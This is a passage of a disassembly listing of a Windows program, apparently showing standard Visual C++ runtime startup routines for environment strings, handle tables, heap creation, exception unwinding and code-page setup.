loc_4030FC: ; CODE XREF: sub_4030A5+2D�j
cmp esi, ebx
jnz short loc_40310C
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz loc_4031CE
loc_40310C: ; CODE XREF: sub_4030A5+59�j
cmp [esi], bx
mov eax, esi
jz short loc_403121
loc_403113: ; CODE XREF: sub_4030A5+73�j
; sub_4030A5+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_403113
inc eax
inc eax
cmp [eax], bx
jnz short loc_403113
loc_403121: ; CODE XREF: sub_4030A5+6C�j
sub eax, esi
mov edi, ds:dword_4050C8
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_403172
push ebp
call sub_403CB6
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_403172
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_40316E
push [esp+18h+var_8]
call sub_403C87
pop ecx
mov [esp+18h+var_8], ebx
loc_40316E: ; CODE XREF: sub_4030A5+B9�j
mov ebx, [esp+18h+var_8]
loc_403172: ; CODE XREF: sub_4030A5+99�j
; sub_4030A5+A8�j
push esi
call ds:dword_4050C4 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_4031D0
; ---------------------------------------------------------------------------
loc_40317D: ; CODE XREF: sub_4030A5+51�j
cmp eax, 2
jnz short loc_4031CE
loc_403182: ; CODE XREF: sub_4030A5+49�j
cmp edi, ebx
jnz short loc_403192
call ds:dword_4050CC ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz short loc_4031CE
loc_403192: ; CODE XREF: sub_4030A5+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_4031A2
loc_403198: ; CODE XREF: sub_4030A5+F6�j
; sub_4030A5+FB�j
inc eax
cmp [eax], bl
jnz short loc_403198
inc eax
cmp [eax], bl
jnz short loc_403198
loc_4031A2: ; CODE XREF: sub_4030A5+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_403CB6
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_4031B8
xor esi, esi
jmp short loc_4031C3
; ---------------------------------------------------------------------------
loc_4031B8: ; CODE XREF: sub_4030A5+10D�j
push ebp
push edi
push esi
call sub_402290
add esp, 0Ch
loc_4031C3: ; CODE XREF: sub_4030A5+111�j
push edi
call ds:dword_4050C0 ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_4031D0
; ---------------------------------------------------------------------------
loc_4031CE: ; CODE XREF: sub_4030A5+39�j
; sub_4030A5+61�j ...
xor eax, eax
loc_4031D0: ; CODE XREF: sub_4030A5+D6�j
; sub_4030A5+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_4030A5 endp
; =============== S U B R O U T I N E =======================================
sub_4031D7 proc near ; CODE XREF: sub_40283E+6F�p
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_403CB6
mov esi, eax
pop ecx
test esi, esi
jnz short loc_4031F7
push 1Bh
call sub_402934
pop ecx
loc_4031F7: ; CODE XREF: sub_4031D7+16�j
mov ds:dword_407340, esi
mov ds:dword_407440, 20h
lea eax, [esi+100h]
loc_40320D: ; CODE XREF: sub_4031D7+52�j
cmp esi, eax
jnb short loc_40322B
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, ds:dword_407340
add esi, 8
add eax, 100h
jmp short loc_40320D
; ---------------------------------------------------------------------------
loc_40322B: ; CODE XREF: sub_4031D7+38�j
lea eax, [esp+54h+var_44]
push eax
call ds:dword_4050A4 ; GetStartupInfoA
cmp word ptr [esp+54h+var_14+2], 0
jz loc_403307
mov eax, [esp+54h+var_10]
test eax, eax
jz loc_403307
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_403261
mov esi, eax
loc_403261: ; CODE XREF: sub_4031D7+86�j
cmp ds:dword_407440, esi
jge short loc_4032BB
mov edi, offset dword_407344
loc_40326E: ; CODE XREF: sub_4031D7+DA�j
push 100h
call sub_403CB6
test eax, eax
pop ecx
jz short loc_4032B5
add ds:dword_407440, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_40328C: ; CODE XREF: sub_4031D7+CF�j
cmp eax, ecx
jnb short loc_4032A8
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_40328C
; ---------------------------------------------------------------------------
loc_4032A8: ; CODE XREF: sub_4031D7+B7�j
add edi, 4
cmp ds:dword_407440, esi
jl short loc_40326E
jmp short loc_4032BB
; ---------------------------------------------------------------------------
loc_4032B5: ; CODE XREF: sub_4031D7+A4�j
mov esi, ds:dword_407440
loc_4032BB: ; CODE XREF: sub_4031D7+90�j
; sub_4031D7+DC�j
xor edi, edi
test esi, esi
jle short loc_403307
loc_4032C1: ; CODE XREF: sub_4031D7+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_4032FE
mov cl, [ebp+0]
test cl, 1
jz short loc_4032FE
test cl, 8
jnz short loc_4032E0
push eax
call ds:dword_405094 ; GetFileType
test eax, eax
jz short loc_4032FE
loc_4032E0: ; CODE XREF: sub_4031D7+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, ds:dword_407340[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_4032FE: ; CODE XREF: sub_4031D7+EF�j
; sub_4031D7+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_4032C1
loc_403307: ; CODE XREF: sub_4031D7+65�j
; sub_4031D7+71�j ...
xor ebx, ebx
loc_403309: ; CODE XREF: sub_4031D7+195�j
mov eax, ds:dword_407340
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_403364
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_403324
push 0FFFFFFF6h
pop eax
jmp short loc_40332E
; ---------------------------------------------------------------------------
loc_403324: ; CODE XREF: sub_4031D7+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_40332E: ; CODE XREF: sub_4031D7+14B�j
push eax
call ds:dword_4050D8 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_403353
push edi
call ds:dword_405094 ; GetFileType
test eax, eax
jz short loc_403353
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_403359
loc_403353: ; CODE XREF: sub_4031D7+163�j
; sub_4031D7+16E�j
or byte ptr [esi+4], 40h
jmp short loc_403368
; ---------------------------------------------------------------------------
loc_403359: ; CODE XREF: sub_4031D7+17A�j
cmp eax, 3
jnz short loc_403368
or byte ptr [esi+4], 8
jmp short loc_403368
; ---------------------------------------------------------------------------
loc_403364: ; CODE XREF: sub_4031D7+13E�j
or byte ptr [esi+4], 80h
loc_403368: ; CODE XREF: sub_4031D7+180�j
; sub_4031D7+185�j ...
inc ebx
cmp ebx, 3
jl short loc_403309
push ds:dword_407440
call ds:dword_4050D4 ; LockResource
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
sub_4031D7 endp
; =============== S U B R O U T I N E =======================================
sub_403382 proc near ; CODE XREF: sub_40283E+5A�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call ds:dword_40508C ; HeapCreate
test eax, eax
mov ds:dword_407328, eax
jz short loc_4033B7
call sub_403D2A
test eax, eax
jnz short loc_4033BA
push ds:dword_407328
call ds:dword_405090 ; HeapDestroy
loc_4033B7: ; CODE XREF: sub_403382+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4033BA: ; CODE XREF: sub_403382+27�j
push 1
pop eax
retn
sub_403382 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033C0 proc near ; CODE XREF: sub_4034B8+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_4033D8
push [ebp+arg_0]
call sub_404CA6 ; RtlUnwind
loc_4033D8: ; DATA XREF: sub_4033C0+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4033C0 endp
; =============== S U B R O U T I N E =======================================
sub_4033E0 proc near ; DATA XREF: sub_403402+A�o
; .text:00403473�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_403401
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_403401: ; CODE XREF: sub_4033E0+10�j
retn
sub_4033E0 endp
; =============== S U B R O U T I N E =======================================
sub_403402 proc near ; CODE XREF: sub_4034B8+67�p
; sub_4034B8+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_4033E0
push large dword ptr fs:0
mov large fs:0, esp
loc_40341F: ; CODE XREF: sub_403402:loc_40345A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40345C
cmp esi, [esp+1Ch+arg_4]
jz short loc_40345C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40345A
push 101h
mov eax, [ebx+esi*4+8]
call sub_403496
call dword ptr [ebx+esi*4+8]
loc_40345A: ; CODE XREF: sub_403402+44�j
jmp short loc_40341F
; ---------------------------------------------------------------------------
loc_40345C: ; CODE XREF: sub_403402+2A�j
; sub_403402+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_403402 endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_4033E0
jnz short locret_40348C
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_40348C
mov eax, 1
locret_40348C: ; CODE XREF: .text:0040347A�j
; .text:00403485�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_406D8C
jmp short loc_4034A0
; =============== S U B R O U T I N E =======================================
sub_403496 proc near ; CODE XREF: sub_403402+4F�p
; sub_4034B8+78�p
push ebx
push ecx
mov ebx, offset dword_406D8C
mov ecx, [ebp+8]
loc_4034A0: ; CODE XREF: .text:00403494�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_403496 endp
; ---------------------------------------------------------------------------
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034B8 proc near ; DATA XREF: sub_40283E+A�o
; sub_40371C+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_403558
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4034EB: ; CODE XREF: sub_4034B8+90�j
cmp esi, 0FFFFFFFFh
jz short loc_403551
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_40353F
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_40353F
js short loc_40354A
mov edi, [ebx+8]
push ebx
call sub_4033C0
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_403402
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_403496
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_40353F: ; CODE XREF: sub_4034B8+40�j
; sub_4034B8+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_4034EB
; ---------------------------------------------------------------------------
loc_40354A: ; CODE XREF: sub_4034B8+54�j
mov eax, 0
jmp short loc_40356D
; ---------------------------------------------------------------------------
loc_403551: ; CODE XREF: sub_4034B8+36�j
mov eax, 1
jmp short loc_40356D
; ---------------------------------------------------------------------------
loc_403558: ; CODE XREF: sub_4034B8+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_403402
add esp, 8
pop ebp
mov eax, 1
loc_40356D: ; CODE XREF: sub_4034B8+97�j
; sub_4034B8+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4034B8 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_403402
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_403590 proc near ; CODE XREF: sub_402934+9�p
; sub_402959+9�p
mov eax, ds:dword_406F48
cmp eax, 1
jz short loc_4035A7
test eax, eax
jnz short locret_4035C8
cmp ds:dword_406AD4, 1
jnz short locret_4035C8
loc_4035A7: ; CODE XREF: sub_403590+8�j
push 0FCh
call sub_4035C9
mov eax, ds:dword_4070A4
pop ecx
test eax, eax
jz short loc_4035BD
call eax
loc_4035BD: ; CODE XREF: sub_403590+29�j
push 0FFh
call sub_4035C9
pop ecx
locret_4035C8: ; CODE XREF: sub_403590+C�j
; sub_403590+15�j
retn
sub_403590 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035C9 proc near ; CODE XREF: sub_402934+12�p
; sub_402959+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_406DA0
loc_4035DC: ; CODE XREF: sub_4035C9+20�j
cmp edx, [eax]
jz short loc_4035EB
add eax, 8
inc ecx
cmp eax, offset byte_406E30
jl short loc_4035DC
loc_4035EB: ; CODE XREF: sub_4035C9+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, ds:dword_406DA0[esi]
jnz loc_403719
mov eax, ds:dword_406F48
cmp eax, 1
jz loc_4036F3
test eax, eax
jnz short loc_40361C
cmp ds:dword_406AD4, 1
jz loc_4036F3
loc_40361C: ; CODE XREF: sub_4035C9+44�j
cmp edx, 0FCh
jz loc_403719
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call ds:dword_405034 ; GetModuleFileNameA
test eax, eax
jnz short loc_403653
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_402720
pop ecx
pop ecx
loc_403653: ; CODE XREF: sub_4035C9+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_402210
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_403696
lea eax, [ebp+var_1A4]
push eax
call sub_402210
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_404600
add esp, 10h
loc_403696: ; CODE XREF: sub_4035C9+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_402720
lea eax, [ebp+var_A0]
push edi
push eax
call sub_402730
lea eax, [ebp+var_A0]
push offset asc_4053E8 ; "\n\n"
push eax
call sub_402730
push ds:off_406DA4[esi]
lea eax, [ebp+var_A0]
push eax
call sub_402730
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_404573
add esp, 2Ch
pop edi
jmp short loc_403719
; ---------------------------------------------------------------------------
loc_4036F3: ; CODE XREF: sub_4035C9+3C�j
; sub_4035C9+4D�j
lea eax, [ebp+arg_0]
lea esi, off_406DA4[esi]
push 0
push eax
push dword ptr [esi]
call sub_402210
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call ds:dword_4050D8 ; GetStdHandle
push eax
call ds:dword_40507C ; WriteFile
loc_403719: ; CODE XREF: sub_4035C9+2E�j
; sub_4035C9+59�j ...
pop esi
leave
retn
sub_4035C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40371C proc near ; CODE XREF: sub_402A4C+5E�p
; sub_403AE6+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405428
push offset sub_4034B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, ds:dword_4070A8
xor ebx, ebx
cmp eax, ebx
jnz short loc_40378B
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_405424
push esi
call ds:dword_405070 ; GetStringTypeW
test eax, eax
jz short loc_403769
mov eax, esi
jmp short loc_403786
; ---------------------------------------------------------------------------
loc_403769: ; CODE XREF: sub_40371C+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_406F38
push esi
push ebx
call ds:dword_405074 ; GetStringTypeA
test eax, eax
jz loc_403851
push 2
pop eax
loc_403786: ; CODE XREF: sub_40371C+4B�j
mov ds:dword_4070A8, eax
loc_40378B: ; CODE XREF: sub_40371C+2F�j
cmp eax, 2
jnz short loc_4037B4
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_40379C
mov eax, ds:dword_4070C4
loc_40379C: ; CODE XREF: sub_40371C+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call ds:dword_405074 ; GetStringTypeA
jmp loc_403853
; ---------------------------------------------------------------------------
loc_4037B4: ; CODE XREF: sub_40371C+72�j
cmp eax, 1
jnz loc_403851
cmp [ebp+arg_10], ebx
jnz short loc_4037CA
mov eax, ds:dword_4070D4
mov [ebp+arg_10], eax
loc_4037CA: ; CODE XREF: sub_40371C+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call ds:dword_405078 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_403851
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_4025D0
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_4021B0
add esp, 0Ch
jmp short loc_403820
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_403820: ; CODE XREF: sub_40371C+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_403851
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call ds:dword_405078 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_403851
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call ds:dword_405070 ; GetStringTypeW
jmp short loc_403853
; ---------------------------------------------------------------------------
loc_403851: ; CODE XREF: sub_40371C+61�j
; sub_40371C+9B�j ...
xor eax, eax
loc_403853: ; CODE XREF: sub_40371C+93�j
; sub_40371C+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40371C endp
; =============== S U B R O U T I N E =======================================
sub_403865 proc near ; CODE XREF: sub_402D47+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_403876
add esp, 0Ch
retn
sub_403865 endp
; =============== S U B R O U T I N E =======================================
sub_403876 proc near ; CODE XREF: sub_403865+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test ds:byte_407221[eax], cl
jnz short loc_4038A3
cmp [esp+arg_4], 0
jz short loc_40389C
movzx eax, ds:word_406AEA[eax*2]
and eax, [esp+arg_4]
jmp short loc_40389E
; ---------------------------------------------------------------------------
loc_40389C: ; CODE XREF: sub_403876+16�j
xor eax, eax
loc_40389E: ; CODE XREF: sub_403876+24�j
test eax, eax
jnz short loc_4038A3
retn
; ---------------------------------------------------------------------------
loc_4038A3: ; CODE XREF: sub_403876+F�j
; sub_403876+2A�j
push 1
pop eax
retn
sub_403876 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038A7 proc near ; CODE XREF: sub_403C6B+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_403A40 ; GetOEMCP
mov esi, eax
pop ecx
cmp esi, ds:dword_407100
mov [ebp+arg_0], esi
jz loc_403A34
xor ebx, ebx
cmp esi, ebx
jz loc_403A2A
xor edx, edx
mov eax, offset dword_406E38
loc_4038DB: ; CODE XREF: sub_4038A7+41�j
cmp [eax], esi
jz short loc_403951
add eax, 30h
inc edx
cmp eax, offset dword_406F28
jl short loc_4038DB
lea eax, [ebp+var_18]
push eax
push esi
call ds:dword_40506C ; GetCPInfo
cmp eax, 1
jnz loc_403A22
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_407220
cmp [ebp+var_18], 1
mov ds:dword_407100, esi
rep stosd
stosb
mov ds:dword_407324, ebx
jbe loc_403A10
cmp [ebp+var_12], 0
jz loc_4039E6
lea ecx, [ebp+var_11]
loc_40392E: ; CODE XREF: sub_4038A7+139�j
mov dl, [ecx]
test dl, dl
jz loc_4039E6
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_40393F: ; CODE XREF: sub_4038A7+A8�j
cmp eax, edx
ja loc_4039DA
or ds:byte_407221[eax], 4
inc eax
jmp short loc_40393F
; ---------------------------------------------------------------------------
loc_403951: ; CODE XREF: sub_4038A7+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_407220
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_406E48[esi]
loc_40396D: ; CODE XREF: sub_4038A7+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_4039A0
loc_403974: ; CODE XREF: sub_4038A7+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_4039A0
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_403999
mov edx, [ebp+var_4]
mov dl, ds:byte_406E30[edx]
loc_40398E: ; CODE XREF: sub_4038A7+F0�j
or ds:byte_407221[eax], dl
inc eax
cmp eax, edi
jbe short loc_40398E
loc_403999: ; CODE XREF: sub_4038A7+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_403974
loc_4039A0: ; CODE XREF: sub_4038A7+CB�j
; sub_4038A7+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_40396D
mov eax, [ebp+arg_0]
mov ds:dword_40711C, 1
push eax
mov ds:dword_407100, eax
call sub_403A8A
lea esi, dword_406E3C[esi]
mov edi, offset dword_407110
movsd
movsd
pop ecx
mov ds:dword_407324, eax
movsd
jmp short loc_403A2F
; ---------------------------------------------------------------------------
loc_4039DA: ; CODE XREF: sub_4038A7+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_40392E
loc_4039E6: ; CODE XREF: sub_4038A7+7E�j
; sub_4038A7+8B�j
push 1
pop eax
loc_4039E9: ; CODE XREF: sub_4038A7+14F�j
or ds:byte_407221[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_4039E9
push esi
call sub_403A8A
pop ecx
mov ds:dword_407324, eax
mov ds:dword_40711C, 1
jmp short loc_403A16
; ---------------------------------------------------------------------------
loc_403A10: ; CODE XREF: sub_4038A7+74�j
mov ds:dword_40711C, ebx
loc_403A16: ; CODE XREF: sub_4038A7+167�j
xor eax, eax
mov edi, offset dword_407110
stosd
stosd
stosd
jmp short loc_403A2F
; ---------------------------------------------------------------------------
loc_403A22: ; CODE XREF: sub_4038A7+51�j
cmp ds:dword_4070AC, ebx
jz short loc_403A38
loc_403A2A: ; CODE XREF: sub_4038A7+27�j
call sub_403ABD
loc_403A2F: ; CODE XREF: sub_4038A7+131�j
; sub_4038A7+179�j
call sub_403AE6
loc_403A34: ; CODE XREF: sub_4038A7+1D�j
xor eax, eax
jmp short loc_403A3B
; ---------------------------------------------------------------------------
loc_403A38: ; CODE XREF: sub_4038A7+181�j
or eax, 0FFFFFFFFh
loc_403A3B: ; CODE XREF: sub_4038A7+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_4038A7 endp
; =============== S U B R O U T I N E =======================================
sub_403A40 proc near ; CODE XREF: sub_4038A7+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and ds:dword_4070AC, 0
cmp eax, 0FFFFFFFEh
jnz short loc_403A60
mov ds:dword_4070AC, 1
jmp ds:dword_405064
; ---------------------------------------------------------------------------
loc_403A60: ; CODE XREF: sub_403A40+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_403A75
mov ds:dword_4070AC, 1
jmp ds:dword_405068
; ---------------------------------------------------------------------------
loc_403A75: ; CODE XREF: sub_403A40+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_403A89
mov eax, ds:dword_4070D4
mov ds:dword_4070AC, 1
locret_403A89: ; CODE XREF: sub_403A40+38�j
retn
sub_403A40 endp
; =============== S U B R O U T I N E =======================================
sub_403A8A proc near ; CODE XREF: sub_4038A7+118�p
; sub_4038A7+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_403AB7
sub eax, 4
jz short loc_403AB1
sub eax, 0Dh
jz short loc_403AAB
dec eax
jz short loc_403AA5
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_403AA5: ; CODE XREF: sub_403A8A+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_403AAB: ; CODE XREF: sub_403A8A+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_403AB1: ; CODE XREF: sub_403A8A+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_403AB7: ; CODE XREF: sub_403A8A+9�j
mov eax, 411h
retn
sub_403A8A endp
; =============== S U B R O U T I N E =======================================
sub_403ABD proc near ; CODE XREF: sub_4038A7:loc_403A2A�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_407220
rep stosd
stosb
xor eax, eax
mov edi, offset dword_407110
mov ds:dword_407100, eax
mov ds:dword_40711C, eax
mov ds:dword_407324, eax
stosd
stosd
stosd
pop edi
retn
sub_403ABD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403AE6 proc near ; CODE XREF: sub_4038A7:loc_403A2F�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push ds:dword_407100
call ds:dword_40506C ; GetCPInfo
cmp eax, 1
jnz loc_403C1F
xor eax, eax
mov esi, 100h
loc_403B10: ; CODE XREF: sub_403AE6+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_403B10
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_403B61
push ebx
push edi
lea edx, [ebp+var_D]
loc_403B2F: ; CODE XREF: sub_403AE6+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_403B56
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_403B56: ; CODE XREF: sub_403AE6+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_403B2F
pop edi
pop ebx
loc_403B61: ; CODE XREF: sub_403AE6+42�j
push 0
